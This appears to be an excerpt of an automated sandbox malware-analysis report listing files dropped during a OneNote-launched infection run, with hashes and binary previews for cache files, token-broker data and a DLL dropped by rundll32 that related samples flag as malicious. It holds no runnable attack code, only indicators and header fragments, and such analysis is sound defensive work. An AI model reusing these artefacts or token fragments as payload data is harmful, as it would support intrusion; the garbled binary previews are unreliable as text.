Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.2871873127247575
Encrypted:	false
SSDEEP:	48:xYR6nv9FY8jgy16YEDbPUErl7f/9ePi1PuPhPuPPPBPjPlP:xWQ9FrcuEDb8EZV+6OhO3BbV
MD5:	FEF540E82351323000B3A86441D54C86
SHA1:	913F1B279BC87430BFBEC60564164887AADFE754
SHA-256:	CC147C88F3DC711AFE7655C1594F15D182F19C17AEDA3A7500100F771D8BF13F
SHA-512:	792787D9F5EBD27B24DAEEB1758828D5B2D879C34823B0A1053647DAB3374F92A9CDD2A5F0FEA3735CEE0C56B86ACE460B2C3A3117891D4A20DEC94C2F4F5FE5
Malicious:	false
Preview:	........$...........t......................................?....................................................................................................\.......................................FV......FV..;L.H...2s..AI......AI..@........'D.~....%<P..K;U'D...AI..@.........AI....8.D..WJ~ :F.............'D......'D..................................................FV.T&h..'D...{..'D.X....'D...4..'D......'D...$.....T.9..[..T(T................4..(.....x.(.....j.L.....j.L.`2.....7a..w.......w...;z&.(.....T2...v.......4....................AI.w...'D....................................AI..c..,0...e...B4.$........[.-...I.......9......................w...;z&.(.....Tw...j.L.`2.....7a..j.L....8.D..WJ~ :F........>.......@........AI..@...........8.D..WJ~ :F................'D......'D.~....%<P..K;U...........8.D..WJ~ :......FV......w....c..,0...e...B4.$..............E........................................0...........e....4..................T.o. .D.o. .L.i.s.t........s.)..O@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.880468927587463
Encrypted:	false
SSDEEP:	192:1sMRrGMh9izx9IO90EKo41ucowrxXQTTmlbQRzEjz:qMDg78NHuxRz
MD5:	38C384B3F6F67C812885F0A142DE8802
SHA1:	CDFEBB47A0C101B798B6B8B53F551023B27D4C4D
SHA-256:	858E4E47EFBCAFA506788EFE32A5A3A8B53603235CBDD3A829E9EEC4589ED296
SHA-512:	97CAE88545B58796407E03C9B34147038AAB695B490E2A34349340B0998C4E8E73050F96E9CF06F18BC3AD54A70C128AC7AE77DCA7057BB682BD9D7FD0C19EA5
Malicious:	false
Preview:	2...>...........v........ .. "..2...>...d...<...v.......@....!...........................................................................................................................................I.......I.qk..B.....LZ..o.;.....oO....4.{.$.....oO....4.{.$.....o..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............It}...$...8......N...^.....................OD.....}.3............(...............................D....I.qk..B.....LZ..............It}...$...8.....................................o.......o.......o...........................................oj......oT&~....o.......o..g....oH......o .)....o$......o..u...................;........4...4...4...................o-..o...o..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(..o#..o8..o..z...,4. .......$>........4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.052002156876205
Encrypted:	false
SSDEEP:	192:W9/Fy3Qa/PlK5xALawpiVbK7lFpreXAcaRJKt1PePtgh9MKmQgUWhlNeHL8FiGWa:Uyga/tK8LKoRJE3CUOz7xX80ZVYIZWe
MD5:	4E55F855D615E6A27BB5435E0E747A60
SHA1:	6F2CC92D3B5E1E3F1C2B1D60A244A2D72DF15DFD
SHA-256:	E22994331573E8CBE67C8476CAD446DDB74BD122E743B59C4E92E6C0137E20D7
SHA-512:	6E325917D6FA3E245B4934ED316F86E35F3E07167EA0693FDA16017C9570759902D102734EC1F8330B146ACC68449C5DD7D339E3ED30D1CBA21F0FC526BEEB1B
Malicious:	false
Preview:	....>.......,...D.......x ..`9......>.......\|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ?.......?..A....5U?w;.L..x.Z.....E..{..x..?..A....5U?w;.LF?....I.qk..B.....LZ.I............x.......x.......x...........................................x.j.....x.T.t...x.......x...N...x.H.....x...5...x...F.%.x...................;........4...4...4..............x.:.x.L.x...z...y.. x.. ...........$........2..72..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'.x.%.x.9.x...z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1........x......x.....%.x.#...'.x.&...2.x.....9.x.....:.x.$.....x.........'.x.%.x..x...z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3..................x.:.x...x...z...y.. x.. ...........$........2..72..7.....*

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.803921644718985
Encrypted:	false
SSDEEP:	192:JsKn8jFIAyLRg2p53VBKSVGw9pXCWbQRJh08uywCTKy98UfRBsu3zXcR9Yts0aid:uMJp537JD/nQRJMywsK68UJCezX6jip3
MD5:	DDBBA0E9F257EE69B596B7311C2C7BAB
SHA1:	1AAA9CCCF3AC65C420C15C473AF5B91AFEB2962E
SHA-256:	4722EAEDC2931C1A2D88E033E9329FA3BD0B2F2006E5F4B319CD14BD931A583E
SHA-512:	B8FAF9FF839D03FBD440E909B4856E5F1C1EE863757BAB748D7C3C2AF997FE222FCCCD9A2352204449FC9845B6F9496BEBEA38FFA0CFE6467C30AA9FBC31D109
Malicious:	false
Preview:	2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ..q.P.....q{......L.......q{......L.......q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............U@..j..'..).......N...^.............../.].c..G...:\|...................................................I.qk..B......LZ............U@..j..'..)......................................q.......q.......q...........................................qj......qT......q..o....q.......q..O....q..s....q$.A.$..q$.................;........4...4...4...............q3..qX..q..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9...............q3..qz..q..z...y.. x.. ...........$........2..72.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8425739056562858
Encrypted:	false
SSDEEP:	48:uiTrlKxsxx7Qxl9Il8uNzyep0hNqylatPhI7SId1rc:vb8Y3Lp0hNnMtPhI7o
MD5:	3A26CC5E1B15BDC50E66BDA400ECDAD7
SHA1:	E790B00AC72DCEF31467FCEDB56F0311DF0818DD
SHA-256:	5C2F26847A3DBC7B10464BE661F229F3293E7F726D0DF4AC89FDC3B4FDE40A5B
SHA-512:	EBB942EBDC77453897D26E739B788F6D00DA9EA315EA3021C5FBD63EC627E0C68E990C675AD550911F456DBABC47A7E9BD4EC980CDDD603258D462E8B668F1CE
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.Z.b.E.S.o.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.8.p.L.B.w.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6106
Entropy (8bit):	4.012184012655125
Encrypted:	false
SSDEEP:	96:dY3VdW9ZdA/c5WyEqbUn2O5YHV+nIcINwzlp73vbIePJDctV3D5RnU:dw2Ac5942WY1+RINwRlbtPG3DPU
MD5:	304D7EA7ADCEEEF9F90B2B8BD5F92D63
SHA1:	A629DE97EBA8AA71A272C06E68FF2E4FE69B5FA1
SHA-256:	DAABF0983D5A6CD164B09F4B36E4F5FFE540DCD9B2BCC53F9138D5E091D5DE2F
SHA-512:	80F918966D13F8708C2A69E7D5A0FB2D55268AF1C78CB6C667AD05438FC07F244C056B95611C5E558730BE2CB536F03044EE73DA3BEECDDC6F09744526548722
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".3.i.i.B.K.P.N.Z.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.8.p.L.B.w.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4542
Entropy (8bit):	3.9985099319097097
Encrypted:	false
SSDEEP:	96:eY37r/wxKnSDKe+hAmNojbmhlJOCAkttS2:ecrYfWhAoojahl8792
MD5:	1A70D1BFAC109E2451F5AA28AD760AEB
SHA1:	D7106C1C97F856C8F8684C904E0BF568F9E61E2B
SHA-256:	CF46517623E28753A78D4F3CB23240B5BDDB4F940E32ED66E2235531CFCF0296
SHA-512:	D35DA73ECC680D7AC3F1CA5941B4CFC974AF90A68F424E1098B170511DE5F23033E8AA6D6E67977F5788232D0D12EADA705C49D9B55C08AA3806EF8C99A6E2E2
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".M.g.U.N.9.y.E.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.8.p.L.B.w.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\X4QZWFTE.htm

Download File

Process:	C:\Windows\SysWOW64\backgroundTaskHost.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2498), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	77336
Entropy (8bit):	5.091097507432205
Encrypted:	false
SSDEEP:	1536:0TBLiqj6cYhYr3EfFROQ18PDqvcgcn8KurLyFb31WDk12ttFYUscby/Rw8AVsIYe:QvWZ0D+eUGqvaxc1FJ
MD5:	5DD36F3B74C29FF23FF01A9009AFDFFE
SHA1:	C3F69220F2A8B6EADC5A6339409FDEAEE966CB75
SHA-256:	4894B5DBA0DC25C2DB841D8650469D34162163FA80ED616B77519535486701CE
SHA-512:	1C42435683BBD4E0FD4E5C9E11D9529984FE05127F921F03C1B3C8CEFD13D81777434E6F1AA6FBDFD7002D327BBF4C1CD57E1480149114632ECEB67DF4A9664E
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html lang="en-US" dir="ltr">. <head>. <meta charset="UTF-8"/>. <meta name="HandheldFriendly" content="True"/>. <meta name="MobileOptimized" content="320"/>. <meta name="viewport" content="width=device-width, initial-scale=1.0"/>.. <title>Networking, Cloud, and Cybersecurity Solutions - Cisco</title>.. .............<meta name="description" content="Cisco delivers innovative software-defined networking, cloud, and security solutions to help transform your business, empowering an inclusive future for all. "/>......<meta name="title" content="Networking, Cloud, and Cybersecurity Solutions"/>......<meta name="templateName" content="homepage"/>......<meta name="locale" content="English (United States)"/>......<meta name="language" content="en"/>......<meta name="country" content="US"/>......<meta name="CCID_Page" content="cc001784"/>......<meta name="date" content="Tue Jan 31 21:47:52 UTC 2023"/>.....<meta name="accessLevel" content="Customer"/><meta n

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\t5[1]

Download File

Process:	C:\Windows\SysWOW64\backgroundTaskHost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.468334280762077
Encrypted:	false
SSDEEP:	3:z+cgAgwunuH3kWdbBhLqRktgqHG680u403:zxObIzbi9h0u4M
MD5:	FE45787D7A2D4CCE45F81BFEFBC411F2
SHA1:	C55A43566C2679C3D81A59F75EFC68C074A7BD71
SHA-256:	101647EEB96FD1818083EA09DC84543BB31B2E03168F0F9C1E69D53BB94E8901
SHA-512:	AAA311D9785D26820DD9D93AA88AC8E585C0BC4D2997E56B33A1D109A96C135318DCA9209B53E634A3AB5613F1D2A5B15A478D55528EB1558613E8B60C1D9C8D
Malicious:	false
Preview:	qEoBZ3iZpZ9CxaH42UpPvBeuPdcKBKbrJL37bgBz7Lza/fQmjgYhgKj0wyqgdw7+AZLYtAHF9BafVvjc00WytWiQwjLV+MvvIaoczlDD

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\76d4c8d1.dll

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1696752
Entropy (8bit):	6.289245533856013
Encrypted:	false
SSDEEP:	24576:ii1trs9xgh4uC6t6B8R9Hb6fvTCK4KtwZ7E3r5am7/Wjh5a6PaDKpN:iVxgOuiB8RBb6WGwO8zSDo
MD5:	83D0087A8DC3B0EE76F68FB273FFF863
SHA1:	019AC92ECD80B9FA6CA9E3F6D09E649CE325ECB5
SHA-256:	4883769CFC1F8633A37A179D3B4AB41CF30B75190ECCF34056F1489648C310C6
SHA-512:	7A1D1D0EB8B7C55570EAC75445152899B3C371A430F4B31EE2F88430AC3425BF34221AF9E09DAA1E30CBEE508A749E9B1534904EE187C19272330ACEE915337C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: qopceyu.dll, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 06mNIWJoVz.exe, Detection: malicious, Browse Filename: 5W8kRNoAdB.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: RS9009.img, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Grant#2929.html, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: RFSL#6617.img, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: dBDfcVVkIk.exe, Detection: malicious, Browse Filename: l39HA25qjw.exe, Detection: malicious, Browse Filename: 44491.6090605324.dat.dll, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L....2............!.........................0....(K.........................0.......\|....@A........................ ...U................................[.......Q...r..p........................... ................................................text...u........................... ..`PAGE............................... ..`RT........... ...................... ..`.data...TZ...0......................@....mrdata.x#.......$..................@....00cfg...............6..............@..@.rsrc................8..............@..@.reloc...Q.......R...6..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675794384334539900_D9937C0E-ABFA-4834-B815-2855C722B4AF.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (9330), with CRLF line terminators
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.058095941908403115
Encrypted:	false
SSDEEP:	1536:ZX7/8RHcjjszBSTfncsqVm+QuoidWTI84HB8Pd9CU9Hb7/tkE9MfMcKssr+DHIkN:SxGBTvki
MD5:	AD5D8E4E56367C3C3CDB4AA64210A218
SHA1:	0C5A7E48B5D84FFF30C9C3E8C6E52B2B5E1DF8A0
SHA-256:	6B664358C1A1F14205873EBF4EEFCCD29799B331117C4D60F0CF771D5E58701C
SHA-512:	EA4976CF64CB10B9E21A45AB4D2B6AFC4D7AE7E368836C8C00EB64F6A388E3D6AF87C835226824EE586ABD7BCC1841D52C07FB02F359AC95AC53AC478D187730
Malicious:	false
Preview:	Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..02/07/2023 18:26:24.483.ONENOTE (0xAD8).0x12A8.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.System.AppLifeCycle.AppLaunch","Flags":2814758373932801,"InternalSequenceNumber":37,"Time":"2023-02-07T18:26:24.483Z"}...02/07/2023 18:26:24.623.ONENOTE (0xAD8).0x12A8.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.NotebookManagement.CreateNotebook","Flags":2814775570513665,"InternalSequenceNumber":42,"Time":"2023-02-07T18:26:24.623Z","Contract":"Office.System.Activity","Activity.CV":"DnyT2fqrNEi4FShVxyK0rw.1.12","Activity.Duration":18236,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.Activity.ActivityType":true,"Data.Activity.Namespace":"Office.OneNote.NotebookManagement","Data.SH_ErrorCode":0,"Data.Activity.Reason":"","Data.Activity.SucceedCount":1}...02/07/2023 18:26:24.623.ONENOTE (0xAD8).0x12A8.Microsoft OneNote.Telemet

C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675794384335329500_D9937C0E-ABFA-4834-B815-2855C722B4AF.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.0
